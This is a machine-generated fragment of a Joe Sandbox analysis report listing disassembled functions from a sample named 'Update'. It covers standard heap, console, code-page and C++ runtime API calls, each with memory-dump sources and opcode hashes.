                                                                                                • Instruction Fuzzy Hash: 8401DEF5900B44DFE360CF7AD881B97B7E9EB45254F11882EE5AE87302DA31A8048F60
                                                                                                APIs
                                                                                                  • Part of subcall function 037F1420: HeapFree.KERNEL32(?,00000000,?,?,?,037F40B1,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F143D
                                                                                                  • Part of subcall function 037F1420: _free.LIBCMT ref: 037F1459
                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 037FCD93
                                                                                                • HeapCreate.KERNEL32(?,?,?), ref: 037FCDA5
                                                                                                • _free.LIBCMT ref: 037FCDB5
                                                                                                • HeapDestroy.KERNEL32 ref: 037FCDE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$Destroy_free$CreateFree
                                                                                                • String ID:
                                                                                                • API String ID: 4097506873-0
                                                                                                • Opcode ID: 0851b0ebaf45714bf5976b4085f68fe32a7d7d6182cc81334f284600a90294f9
                                                                                                • Instruction ID: 49a6047fbb08fc513b48bd53fd0c12f049e05f9b96cc68a7a7f874e6cec86236
                                                                                                • Opcode Fuzzy Hash: 0851b0ebaf45714bf5976b4085f68fe32a7d7d6182cc81334f284600a90294f9
                                                                                                • Instruction Fuzzy Hash: F1F037B9100B06AFD310EF24E808B5BFBB8FF84710F144918E95997744DB74E891CBA0
                                                                                                APIs
                                                                                                  • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                                                  • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 100064A3
                                                                                                • HeapCreate.KERNEL32(?,?,?), ref: 100064B5
                                                                                                • _free.LIBCMT ref: 100064C5
                                                                                                • HeapDestroy.KERNEL32 ref: 100064F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$Destroy_free$CreateFree
                                                                                                • String ID:
                                                                                                • API String ID: 4097506873-0
                                                                                                • Opcode ID: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                                                • Instruction ID: e941b2b67b7b789b38fb12685925c4a960f3707d906db07a4445c0daadc26747
                                                                                                • Opcode Fuzzy Hash: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                                                • Instruction Fuzzy Hash: 28F032B9600702ABE710CF65D848B53B7FAFF88791F218528E86987244DB35F851CBA0
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,6CAB07FB,00000000,00000000,00000000,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000), ref: 6CABB20E
                                                                                                • GetLastError.KERNEL32(?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?,?,?,6CAB12FE,?), ref: 6CABB21A
                                                                                                  • Part of subcall function 6CABB26B: CloseHandle.KERNEL32(FFFFFFFE,6CABB22A,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?,?), ref: 6CABB27B
                                                                                                • ___initconout.LIBCMT ref: 6CABB22A
                                                                                                  • Part of subcall function 6CABB24C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CABB1E8,6CABA506,?,?,6CAB19B8,?,00000000,00000000,?), ref: 6CABB25F
                                                                                                • WriteConsoleW.KERNEL32(00000000,6CAB07FB,00000000,00000000,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?), ref: 6CABB23F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: f0172804bddb4a7a05225980464872e78d39a760b42468dea8ffcc7fbb410488
                                                                                                • Instruction ID: a7a0e949e9c9e93616e3abc229cb0fb476250c0eeefde24b163e61a6f6a0bcbe
                                                                                                • Opcode Fuzzy Hash: f0172804bddb4a7a05225980464872e78d39a760b42468dea8ffcc7fbb410488
                                                                                                • Instruction Fuzzy Hash: D2F01C36600625BBCF162FE6DC489CE3F7AFB0B3A4B048111FA1895620C63289629B90
                                                                                                APIs
                                                                                                • ReadConsoleInputW.KERNEL32(0000000C,6CAC9D90,6CAA3444,00000000,?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0A9D
                                                                                                • GetLastError.KERNEL32(?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0AA9
                                                                                                  • Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D
                                                                                                • ___initconin.LIBCMT ref: 6CAB0AB9
                                                                                                  • Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11
                                                                                                • ReadConsoleInputW.KERNEL32(0000000C,6CAC9D90,6CAA3444,?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0ACD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                                                                • String ID:
                                                                                                • API String ID: 838051604-0
                                                                                                • Opcode ID: 98709031be726f92d8a8f1a251c79f951990ea69abec23e22f97466218e98476
                                                                                                • Instruction ID: b2e2a6da8db8a004bfda3f7302dcb69b9480e157bdcda4f3daa0e9d938a68c5f
                                                                                                • Opcode Fuzzy Hash: 98709031be726f92d8a8f1a251c79f951990ea69abec23e22f97466218e98476
                                                                                                • Instruction Fuzzy Hash: 9EF0653610125ABBCF161FE5CD048993F7AFB493687058154FA29F2220CF32C9A1DBC0
                                                                                                APIs
                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6CA9D1D9
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CA9D1E8
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6CA9D1F1
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6CA9D1FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 768c71dd0434c2fbcd8b2f4bf1103447256a92eb2082f72d6a5833ce0f7b04e7
                                                                                                • Instruction ID: 48ac867887fd1d3f89f2916ec8b227044834a774e9d80b4f4bf067917034f774
                                                                                                • Opcode Fuzzy Hash: 768c71dd0434c2fbcd8b2f4bf1103447256a92eb2082f72d6a5833ce0f7b04e7
                                                                                                • Instruction Fuzzy Hash: 07F06275D1020DEBCF04DFB4C68999EBBF4EF1D200B918596A512E7140E730AB85DF50
                                                                                                APIs
                                                                                                • GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0AE9
                                                                                                • GetLastError.KERNEL32(?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0AF5
                                                                                                  • Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D
                                                                                                • ___initconin.LIBCMT ref: 6CAB0B05
                                                                                                  • Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11
                                                                                                • GetNumberOfConsoleInputEvents.KERNEL32(?,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
                                                                                                • String ID:
                                                                                                • API String ID: 1600138625-0
                                                                                                • Opcode ID: 7b637d559fff3c31a35a55036f302b04b397ea54ec648646dc524ccd95de803d
                                                                                                • Instruction ID: cfd799bd6464756349b2f885efb9e7f7bc54b3b0561c0c73919ec8c16a2d2604
                                                                                                • Opcode Fuzzy Hash: 7b637d559fff3c31a35a55036f302b04b397ea54ec648646dc524ccd95de803d
                                                                                                • Instruction Fuzzy Hash: 92E048316002597B8F162BAAC9489893E79EB067BD3054120F905F3610CB318DD2D7D0
                                                                                                APIs
                                                                                                • SetConsoleMode.KERNEL32(0000000C,00000000,?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BC7
                                                                                                • GetLastError.KERNEL32(?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BD3
                                                                                                  • Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D
                                                                                                • ___initconin.LIBCMT ref: 6CAB0BE3
                                                                                                  • Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11
                                                                                                • SetConsoleMode.KERNEL32(0000000C,?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BF1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                                                                • String ID:
                                                                                                • API String ID: 3067319862-0
                                                                                                • Opcode ID: 3e7349d15a8d79a644f5b5f9e5d79694ba557642a9f11a8cea55cabd1552072e
                                                                                                • Instruction ID: 6cf1cdb49e4104104f618266adfb2e4292deca3c6e6cbbe619fe88acbf09e3e4
                                                                                                • Opcode Fuzzy Hash: 3e7349d15a8d79a644f5b5f9e5d79694ba557642a9f11a8cea55cabd1552072e
                                                                                                • Instruction Fuzzy Hash: D8E086326403666B8F152BE6CD089893E79EB063BD3088120F909E3610CF318DD29BD0
                                                                                                APIs
                                                                                                • GetConsoleMode.KERNEL32(0000000C,?,?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0B81
                                                                                                • GetLastError.KERNEL32(?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0B8D
                                                                                                  • Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D
                                                                                                • ___initconin.LIBCMT ref: 6CAB0B9D
                                                                                                  • Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11
                                                                                                • GetConsoleMode.KERNEL32(0000000C,?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                                                                • String ID:
                                                                                                • API String ID: 3067319862-0
                                                                                                • Opcode ID: 9148f16bbdedd300ba9a025a0783e179fe7d027d7505f24983820cf9497922f9
                                                                                                • Instruction ID: 470aff3489cc7c470db460cd1f32745a9c4da612987646137aa74d456d780b30
                                                                                                • Opcode Fuzzy Hash: 9148f16bbdedd300ba9a025a0783e179fe7d027d7505f24983820cf9497922f9
                                                                                                • Instruction Fuzzy Hash: 78E0483660036A7B8F152B97CA089893F79EB067AD7054150F909E3610CB318DD2D7D0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldiv
                                                                                                • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                • API String ID: 3732870572-1956417402
                                                                                                • Opcode ID: a30847a847bb42a7a7d8c58dc7df8a8da37abdf859116ac70011d1ad057289ed
                                                                                                • Instruction ID: 41acefbc1a74090358555786166a6f1c8fb4bb0c495db8869cdaa3ab7d29b4df
                                                                                                • Opcode Fuzzy Hash: a30847a847bb42a7a7d8c58dc7df8a8da37abdf859116ac70011d1ad057289ed
                                                                                                • Instruction Fuzzy Hash: 2C613870E242499FDF20CEA9D8827AEBBF9AF45304F184299D450ABB50C77489C58B50
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAAA893: GetLastError.KERNEL32(?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAAA897
                                                                                                  • Part of subcall function 6CAAA893: SetLastError.KERNEL32(00000000,6CA81A6D,00000000), ref: 6CAAA939
                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,6CAAB1CB,?,?,?,00000055,?,-00000050,?,?,?), ref: 6CAB5931
                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,6CAAB1CB,?,?,?,00000055,?,-00000050,?,?), ref: 6CAB5968
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                • String ID: utf8
                                                                                                • API String ID: 943130320-905460609
                                                                                                • Opcode ID: c38c7f1c403e3978a0cc5575feafc8516c73928c0f8a4871140bdabb9075a326
                                                                                                • Instruction ID: 02ac32aa8f7dd621b274f1c3152064e157c20d4f5db812f9ce9d4c88b6494a4e
                                                                                                • Opcode Fuzzy Hash: c38c7f1c403e3978a0cc5575feafc8516c73928c0f8a4871140bdabb9075a326
                                                                                                • Instruction Fuzzy Hash: 5F511631605305AAE714ABB5CC89BE773ACEF09718F18042EE515B7A80F771D6C9C7A1
                                                                                                APIs
                                                                                                  • Part of subcall function 6CA9B51D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA9B529
                                                                                                • _strlen.LIBCMT ref: 6CA82718
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlenstd::invalid_argument::invalid_argument
                                                                                                • String ID: ios_base::badbit set$string too long
                                                                                                • API String ID: 4097767454-3021579929
                                                                                                • Opcode ID: 7b5b43e7bdb7d3761e9c1092b3b507ece3404317dcef324006afc86668a016b0
                                                                                                • Instruction ID: 266dbb6693c2c4aadf6c4401b1b22158c48c9ca1129c2ce71e5523645f2c4ad3
                                                                                                • Opcode Fuzzy Hash: 7b5b43e7bdb7d3761e9c1092b3b507ece3404317dcef324006afc86668a016b0
                                                                                                • Instruction Fuzzy Hash: A841C8B2D112189FCB10CFA9DD85BEEBBB9FF48314F150625E805A7740E7319998C7A1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                • String ID: gfff
                                                                                                • API String ID: 1635606685-1553575800
                                                                                                • Opcode ID: 447b51e6a7f64eaa924e28e9249781c5849d12a080851340c8c23540489119c7
                                                                                                • Instruction ID: b89412634b8190231affd0c8e1ca86c378c7a1c838b2d7246cde090d4697aaef
                                                                                                • Opcode Fuzzy Hash: 447b51e6a7f64eaa924e28e9249781c5849d12a080851340c8c23540489119c7
                                                                                                • Instruction Fuzzy Hash: 19313CB6E036169BCB11CEE9C940A9FB7B49F4171CB69062DC8A1E7E40E730D9C78790
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6CAA9FC8,?,?,00000000,00000000,00000000,?), ref: 6CAAA0EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: 190cfa80d0e4b0a4bf1a1228e74d06c600278869ad46dc33bc6d8d8a2e6762c2
                                                                                                • Instruction ID: b0c47bf7e5c6debf10af9ebc62c9e70a6331db9bc1dd03c80d3fc2ab04f54bd9
                                                                                                • Opcode Fuzzy Hash: 190cfa80d0e4b0a4bf1a1228e74d06c600278869ad46dc33bc6d8d8a2e6762c2
                                                                                                • Instruction Fuzzy Hash: 78413871A01209AFCF05CFD4C980AEEBBB6FF48308F188159E91567650D3369996DF51
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA830E6
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA83222
                                                                                                  • Part of subcall function 6CA9B0F3: _Yarn.LIBCPMT ref: 6CA9B113
                                                                                                  • Part of subcall function 6CA9B0F3: _Yarn.LIBCPMT ref: 6CA9B137
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 2070049627-1405518554
                                                                                                • Opcode ID: ec120b4588b4926c737e649638b8d9f09f62d8270d27d5f899096de57c271463
                                                                                                • Instruction ID: 6ee553133cb36af9976532687a199820f5918de37fa837d95fdca4227039a2da
                                                                                                • Opcode Fuzzy Hash: ec120b4588b4926c737e649638b8d9f09f62d8270d27d5f899096de57c271463
                                                                                                • Instruction Fuzzy Hash: D94159F1A016059BEB10CF69D904B5BBAE8BB04B08F044628E4599BB80E779E55CCBE1
                                                                                                APIs
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CAA9BAA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___except_validate_context_record
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 3493665558-3733052814
                                                                                                • Opcode ID: d5d2a1d05f3bdb2b06b8b4b8d6cd7e50ff8e133c35ad7ea64f3880406e127272
                                                                                                • Instruction ID: 1e60cabaf4af88a200e6827625794bc01e4cec3a543b820c3da6d4ad2d8bea3f
                                                                                                • Opcode Fuzzy Hash: d5d2a1d05f3bdb2b06b8b4b8d6cd7e50ff8e133c35ad7ea64f3880406e127272
                                                                                                • Instruction Fuzzy Hash: C131A132414618BFCF128FE5CA4099A7BAAFB09719B18465AF8544B921C333C8E3DB91
                                                                                                APIs
